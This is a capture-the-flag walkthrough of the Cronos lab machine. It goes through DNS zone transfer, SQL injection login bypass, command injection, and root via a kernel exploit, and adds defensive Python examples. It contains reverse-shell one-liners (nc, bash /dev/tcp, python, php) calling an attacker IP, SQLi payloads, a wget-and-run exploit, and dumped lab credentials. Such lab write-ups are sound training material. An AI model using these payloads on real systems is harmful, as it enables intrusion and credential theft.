1. SCANNING

 

┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 10.10.10.13                                                     1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 17:17 KST
Nmap scan report for 10.10.10.13
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(root💀takudaddy)-[~]
└─# nmap --script vuln -oA vulnscan 10.10.10.13
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 17:25 KST
Nmap scan report for 10.10.10.13
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)

 

 

53 domain

An Apache default page like this, on a host that also exposes port 53, usually means the real site is served by a name-based virtual host: a request by bare IP falls through to the default site configuration instead of the one we want.

So check which names the name server running on this IP knows about.

┌──(root💀takudaddy)-[/htb/c]
└─# nslookup                                          1 ⨯
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 
> 10.10.10.13
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.
> 
> cronos.htb
Server:         10.10.10.13
Address:        10.10.10.13#53

Name:   cronos.htb
Address: 10.10.10.13
>          




Further enumeration: since the host runs its own name server, try a zone transfer (AXFR) against it.
┌──(root💀takudaddy)-[/htb/c]
└─# dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 20 20:56:09 KST 2021
;; XFR size: 7 records (messages 1, bytes 203)

Four hosts are defined under cronos.htb (cronos.htb, admin, ns1 and www, all pointing at 10.10.10.13).

A name server that answers AXFR for anyone is a misconfiguration in itself; here it hands us the complete list of virtual hosts. Register them all in the hosts file, mapping 10.10.10.13 to cronos.htb and the three subdomains:

┌──(root💀takudaddy)-[/htb/c]
└─# cat /etc/hosts                                 
127.0.0.1       localhost
127.0.1.1       takudaddy.example.com   takudaddy
10.10.10.13     cronos.htb www.cronos.htb admin.cronos.htb ns1.cronos.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
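The hosts line above can be generated straight from the transfer. The script below is an added example, not code from the original post: it parses the dig axfr output quoted earlier (embedded here as sample input), groups the A records per address and emits ready-to-paste /etc/hosts entries, plus the NS and SOA data that is worth querying next. The function names (parse_axfr, hosts_entries, zone_summary) are the example's own.

```python
"""Turn the textual output of `dig axfr` into /etc/hosts entries.

Added example (not part of the original post). It parses the record lines
from the zone transfer shown on this page, groups every A record by address
so one line per IP can be appended to /etc/hosts, and reports the NS and SOA
names, which are the hosts worth browsing to or querying first.
"""
import re
from collections import defaultdict

# Sample input: the zone-transfer output shown earlier on this page.
AXFR_OUTPUT = """\
; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.13 cronos.htb
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 212 msec
"""

# owner  ttl  IN  type  rdata
RECORD_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.*)$")


def parse_axfr(text):
    """Return (name, ttl, type, rdata) tuples, ignoring dig's ';' comment lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            name, ttl, rtype, rdata = m.groups()
            records.append((name.rstrip("."), int(ttl), rtype, rdata.strip()))
    return records


def hosts_entries(records):
    """Group A records by IP and return /etc/hosts lines, zone apex first."""
    by_ip = defaultdict(list)
    for name, _ttl, rtype, rdata in records:
        if rtype == "A" and name not in by_ip[rdata]:
            by_ip[rdata].append(name)
    lines = []
    for ip, names in sorted(by_ip.items()):
        names.sort(key=lambda n: (n.count("."), n))  # fewest labels first
        lines.append("%s\t%s" % (ip, " ".join(names)))
    return lines


def zone_summary(records):
    """Name servers and SOA record: the most useful non-A data in a transfer."""
    ns = sorted({r[3].rstrip(".") for r in records if r[2] == "NS"})
    soa = next((r[3] for r in records if r[2] == "SOA"), None)
    return {"ns": ns, "soa": soa}


if __name__ == "__main__":
    recs = parse_axfr(AXFR_OUTPUT)
    print("\n".join(hosts_entries(recs)))
    print(zone_summary(recs))
```

On a real box, feed it `dig axfr @<ns> <zone>` output; a server that refuses the transfer prints "Transfer failed." and no record lines, so the hosts list simply comes out empty.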

 

 

 

Browsing to the hostname now brings up the real site instead of the default page.

If you work through Burp instead, turn Intercept on, change the Host header to cronos.htb and forward the request; that is enough for a quick look without touching /etc/hosts.

 

 

 

 


 

 

 

2. WEB ENUMERATION + EXPLOITATION

 

 

Directory brute-force against http://cronos.htb/ (dirb output):

==> DIRECTORY: http://cronos.htb/css/
+ http://cronos.htb/favicon.ico (CODE:200|SIZE:0)
+ http://cronos.htb/index.php (CODE:200|SIZE:2319)
==> DIRECTORY: http://cronos.htb/js/
+ http://cronos.htb/robots.txt (CODE:200|SIZE:24)
+ http://cronos.htb/server-status (CODE:403|SIZE:298)
+ http://cronos.htb/web.config (CODE:200|SIZE:914)

Next, the admin vhost found in the zone transfer.

admin.cronos.htb enumeration

 

 

 

┌──(root💀takudaddy)-[/htb/c]
└─# sqlmap -u http://admin.cronos.htb --data="username=admin&password=" --dbs --batch   
        ___
       __H__                                                                        
 ___ ___[)]_____ ___ ___  {1.5.2#stable}                                            
|_ -| . ["]     | .'| . |                                                           
|___|_  [.]_|_|_|__,|  _|                                                           
      |_|V...       |_|   http://sqlmap.org                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
....

 

While sqlmap runs, try the simple injection strings by hand in the login form:

' or 1=1 -- -

' or 1=1 #

Login succeeded, so the form input is concatenated straight into the SQL query.
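Why that payload works, shown in code. This is an added example, not the box's PHP (the post never shows the login source): it rebuilds the login check against an in-memory SQLite table holding the one users row sqlmap dumps further down, and runs the injected username through both a string-concatenated query and a parameterised one. SQLite stands in for the box's MySQL so the example runs offline; SQLite does not treat # as a comment, so only the `-- -` variant is exercised here. The md5-then-compare scheme matches the hash sqlmap recovered but is an assumption about the application.

```python
"""The vulnerable login next to the fixed one (added example, not the box's code).

An injected username such as `' or 1=1 -- -` turns the WHERE clause into
`username = '' or 1=1` and comments out the password check, so the first row
comes back and the login succeeds. Bound parameters keep the quote as data.
"""
import hashlib
import sqlite3

# Constructed fixture: the same users row the sqlmap dump on this page returned.
ADMIN_HASH = "4f5fffa7b2340178a716e3832451e058"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    return db


def login_vulnerable(db, username, password):
    """Mirrors the classic PHP pattern: user input is pasted into the SQL text."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (username, pw_hash))
    return db.execute(sql).fetchone() is not None


def login_fixed(db, username, password):
    """Same check with bound parameters: the quote in the input is data, not SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 -- -"
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))   # True
    print("fixed:     ", login_fixed(db, payload, "wrong"))        # False
    print("real creds:", login_fixed(db, "admin", "1327663704"))   # True
```

The fixed version still verifies the real credentials (the plaintext the post recovers later), so the change is purely in how the query is built, not in what it checks.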

 

 

 

Meanwhile the sqlmap run finished too:

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[23:50:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
a
[23:50:48] [INFO] adjusting time delay to 2 seconds due to good response times
tion_schema
[23:52:20] [INFO] retrieved: admin
available databases [2]:
[*] `@\x00\x01nfoation_schema`
[*] admin

[23:52:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin.cronos.htb'                                                           

[*] ending @ 23:52:58 /2021-04-20/

 

sqlmap found a database named admin.

With the login already bypassed there is little point digging further, but for practice I let it run and dumped the database anyway. The result:

┌──(root💀takudaddy)-[/htb/c]
└─# sqlmap -u http://admin.cronos.htb --data="username=admin&password=" -D admin --tables --dump --batch

do you want to use common password suffixes? (slow!) [y/N] N
[00:04:41] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:04:41] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[00:05:02] [WARNING] no clear password(s) found                                    
Database: admin
Table: users
[1 entry]
+----+----------------------------------+----------+
| id | password                         | username |
+----+----------------------------------+----------+
| 1  | 4f5fffa7b2340178a716e3832451e058 | admin    |
+----+----------------------------------+----------+

[00:05:02] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin.cronos.htb/dump/admin/users.csv'                                       
[00:05:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin.cronos.htb' 

 

 

 

 

Next, try appending an extra command to the input the admin page accepts.

It works: the injected command runs, so we have command injection as the web user.

Having spotted the user noulis, I left hydra brute-forcing SSH in the background, started a listener, and used the injection to try reverse shells. Two things worth knowing when a payload does not call back: /bin/sh on Ubuntu is dash, which has no /dev/tcp, so the bash one-liner cannot work unless bash itself is invoked; and the python one-liner below dials port 8989 while the listener was on 7979, so that attempt could not have connected as typed. Cycling through a few payloads is the normal approach:

nc -e /bin/bash 10.10.14.13 7979                                   => no connection
bash -i >& /dev/tcp/10.10.14.13/7979 0>&1                          => no connection
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
                                                                   => no connection
======================================================
php -r '$sock=fsockopen("10.10.14.13",7979);exec("/bin/sh -i <&3 >&3 2>&3");'   => works!

 

 

┌──(root💀takudaddy)-[/attack]
└─# nc -lvnp 7979                                            130 ⨯
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 39362
/bin/sh: 0: can't access tty; job control turned off
$ date ; whoami ; id ; hostname ; ifconfig
Tue Apr 20 15:27:39 EEST 2021
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cronos
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:4b:74  
          inet addr:10.10.10.13  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:4b74/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:4b74/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8696380 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6427641 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2230143311 (2.2 GB)  TX bytes:1285197176 (1.2 GB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:6265 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6265 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:613245 (613.2 KB)  TX bytes:613245 (613.2 KB)

$ 

 

Foothold obtained: a shell as www-data on cronos.

 

 

 


 

 

3. PRIVILEGE ESCALATION

 

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ ls -al
ls -al
total 32
drwxr-xr-x 2 www-data www-data 4096 Jan  1 02:31 .
drwxr-xr-x 5 root     root     4096 Apr  9  2017 ..
-rw-r--r-- 1 www-data www-data 1024 Apr  9  2017 .welcome.php.swp
-rw-r--r-- 1 www-data www-data  237 Apr  9  2017 config.php
-rw-r--r-- 1 www-data www-data 2531 Jan  1 02:31 index.php
-rw-r--r-- 1 www-data www-data  102 Apr  9  2017 logout.php
-rw-r--r-- 1 www-data www-data  383 Apr  9  2017 session.php
-rw-r--r-- 1 www-data www-data  782 Apr  9  2017 welcome.php
www-data@cronos:/var/www/admin$ cat config.php
cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$ 


www-data@cronos:/var/www/admin$ mysql -u admin -p
mysql -u admin -p
Enter password: kEjdbRigfBHUREiNSDs

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 375
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| admin              |
+--------------------+
2 rows in set (0.00 sec)

mysql> use admin;
use admin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------+
| Tables_in_admin |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users ;
select * from users ;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+

www-data@cronos:/home/noulis$ ls -al
ls -al
total 44
drwxr-xr-x 4 noulis noulis 4096 Apr  9  2017 .
drwxr-xr-x 3 root   root   4096 Mar 22  2017 ..
-rw------- 1 root   root      1 Dec 24  2017 .bash_history
-rw-r--r-- 1 noulis noulis  220 Mar 22  2017 .bash_logout
-rw-r--r-- 1 noulis noulis 3771 Mar 22  2017 .bashrc
drwx------ 2 noulis noulis 4096 Mar 22  2017 .cache
drwxr-xr-x 3 root   root   4096 Apr  9  2017 .composer
-rw------- 1 root   root    259 Apr  9  2017 .mysql_history
-rw-r--r-- 1 noulis noulis  655 Mar 22  2017 .profile
-rw-r--r-- 1 root   root     66 Apr  9  2017 .selected_editor
-rw-r--r-- 1 noulis noulis    0 Mar 22  2017 .sudo_as_admin_successful
-r--r--r-- 1 noulis noulis   33 Mar 22  2017 user.txt
www-data@cronos:/home/noulis$ cat user.txt
cat user.txt
51d236438b333970dbba7dc3089be33b

 

 

The hash from the users table cracks to a numeric password:

4f5fffa7b2340178a716e3832451e058 : 1327663704

admin : 1327663704

This is the same hash sqlmap already dumped above (its built-in wordlist did not crack it), and with the login already bypassed the plaintext is only for completeness.

 

 

 

www-data@cronos:/home/noulis/.composer$ ls -al
ls -al
total 24
drwxr-xr-x 3 root   root   4096 Apr  9  2017 .
drwxr-xr-x 4 noulis noulis 4096 Apr  9  2017 ..
-rw-r--r-- 1 root   root     13 Apr  9  2017 .htaccess
drwxr-xr-x 5 root   root   4096 Apr  9  2017 cache
-rw-r--r-- 1 root   root    799 Apr  9  2017 keys.dev.pub
-rw-r--r-- 1 root   root    799 Apr  9  2017 keys.tags.pub

www-data@cronos:/home/noulis/.composer$ cat keys.dev.pub
cat keys.dev.pub
(output not captured in the post)

www-data@cronos:/home/noulis/.composer$ cat keys.tags.pub
cat keys.tags.pub
-----BEGIN PUBLIC KEY-----
(key body not captured in the post)
-----END PUBLIC KEY-----

These are Composer's own public keys, used by composer self-update to verify release signatures. They are not credentials, so there is nothing to gain here.

www-data@cronos:/dev$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16  2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16  2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29  2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 38984 Mar  7  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29  2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29  2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29  2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29  2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15  2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29  2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29  2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29  2016 /usr/bin/passwd
www-data@cronos:/dev$ 

 

 

 

The quick way: a kernel exploit. Linux Exploit Suggester (LES.sh), uploaded to /tmp and run on the target:

www-data@cronos:/tmp$ ./LES.sh
./LES.sh

Available information:

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

76 kernel space exploits
48 user space exploits

Possible Exploits:

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

 

 

The 45010.c exploit (CVE-2017-16995, the eBPF verifier bug LES lists first) names the following Ubuntu 16.04 kernels as tested:

4.4.0-31-generic

4.4.0-62-generic

4.4.0-81-generic

4.4.0-116-generic

4.8.0-58-generic

4.10.0.42-generic

4.13.0-21-generic

This box runs 4.4.0-72-generic, which is not on the list but sits between two listed builds, and it turned out to be exploitable. Keep in mind that a failed kernel exploit can panic the target; on a shared lab box or a real engagement, prefer the cron route described further down whenever it is available.

 

www-data@cronos:/var/www/laravel/config$ uname -a
uname -a
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@cronos:/var/www/laravel/config$ cd /tmp
cd /tmp
www-data@cronos:/tmp$ wget http://10.10.14.13/45010
wget http://10.10.14.13/45010
--2021-04-20 16:07:35--  http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: '45010'

45010                 0%[                    ]       0  --.-KB/s     45010                77%[==============>     ]  16.82K  81.8KB/s     45010               100%[===================>]  21.74K   105KB/s    in 0.2s    

2021-04-20 16:07:35 (105 KB/s) - '45010' saved [22264/22264]

www-data@cronos:/tmp$ chmod +x 45010
chmod +x 45010
www-data@cronos:/tmp$ ./45010
./45010
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880039aca900
[*] Leaking sock struct from ffff8800372cdc00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003dc11300
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff88003dc11300
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
cat /root/root.txt
1703b8a3c9a8dde879942c79d02fd3a0
# 

 

 

 

 

 

Another way: the root cron job. This route needs no kernel exploit, so it will not risk crashing the box.

www-data@cronos:/var/www/admin$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
www-data@cronos:/var/www/admin$ 
www-data@cronos:/var/www/laravel$ ls -l /var/www/laravel/artisan
ls -l /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan

www-data@cronos:/var/www/laravel$ file artisan 
file artisan
artisan: a /usr/bin/env php script, ASCII text executable

 

artisan is a PHP script owned and writable by www-data, and root runs it through php every minute. That is the whole problem: anything the script loads (Laravel's own app/Console/Kernel.php included) is under our control and executes as root.
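The check a practitioner wants here, as an added example (not from the original post): parse the system crontab shown above and flag every root job whose command references a file that is not root-owned or is group/world writable. On a live box you would stat the paths; to keep the example runnable offline, a constructed owner/mode table stands in for os.stat(). The artisan entry in that table is taken from the `ls -l` above; the entries for /etc/cron.hourly, /etc/cron.daily and /usr/sbin/anacron are assumed root-owned, which is the normal state.

```python
"""Flag root cron jobs that execute files a lower-privileged user can change.

Added example, not from the original post. It parses /etc/crontab-style lines
and, for each job run as root, checks the absolute paths in the command against
file metadata. FILE_META is a constructed stand-in for os.stat() so the script
runs offline; replace it with real stat() calls on a target.
"""
import re
import shlex

# Sample input: the relevant lines of the crontab shown on this page.
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# Constructed stand-in for os.stat(): path -> (owner uid, mode bits).
# uid 33 is www-data on this box (see the `id` output above); the other
# three entries are assumptions (root-owned, 0755), which is the normal state.
FILE_META = {
    "/var/www/laravel/artisan": (33, 0o755),   # -rwxr-xr-x www-data www-data
    "/etc/cron.hourly": (0, 0o755),
    "/etc/cron.daily": (0, 0o755),
    "/usr/sbin/anacron": (0, 0o755),
}

# five time fields, the user field, then the command
CRON_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def parse_system_crontab(text):
    """Return (user, command) for each job line; skip comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group(6), m.group(7)))
    return jobs


def referenced_paths(command):
    """Absolute paths mentioned anywhere in the command string."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def weak_root_jobs(jobs, meta):
    """Root jobs touching a file that is not root-owned or is group/world writable."""
    findings = []
    for user, command in jobs:
        if user != "root":
            continue
        for path in referenced_paths(command):
            if path not in meta:      # unknown path: nothing to judge offline
                continue
            uid, mode = meta[path]
            if uid != 0 or mode & 0o022:
                findings.append((command, path, uid, oct(mode)))
    return findings


if __name__ == "__main__":
    for command, path, uid, mode in weak_root_jobs(parse_system_crontab(CRONTAB), FILE_META):
        print("root runs %s via %r (owner uid %d, mode %s)" % (path, command, uid, mode))
```

The artisan job is the only hit: root-owned scripts with 0755 pass, the www-data-owned artisan does not. The same idea extends to the files a flagged script itself includes, which is exactly why editing Kernel.php works below.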

www-data@cronos:/var/www/laravel$ cat artisan
cat artisan
#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/

$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);

$status = $kernel->handle(
    $input = new Symfony\Component\Console\Input\ArgvInput,
    new Symfony\Component\Console\Output\ConsoleOutput
);

/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/

$kernel->terminate($input, $status);

exit($status);


www-data@cronos:/var/www/laravel$ php artisan schedule:run
php artisan schedule:run
No scheduled commands are ready to run.


 

 

 

https://laravel.kr/docs/5.7/scheduling

Laravel 5.7 - Task Scheduling (Korean docs). The schedule that schedule:run evaluates every minute is defined in app/Console/Kernel.php.

 

 

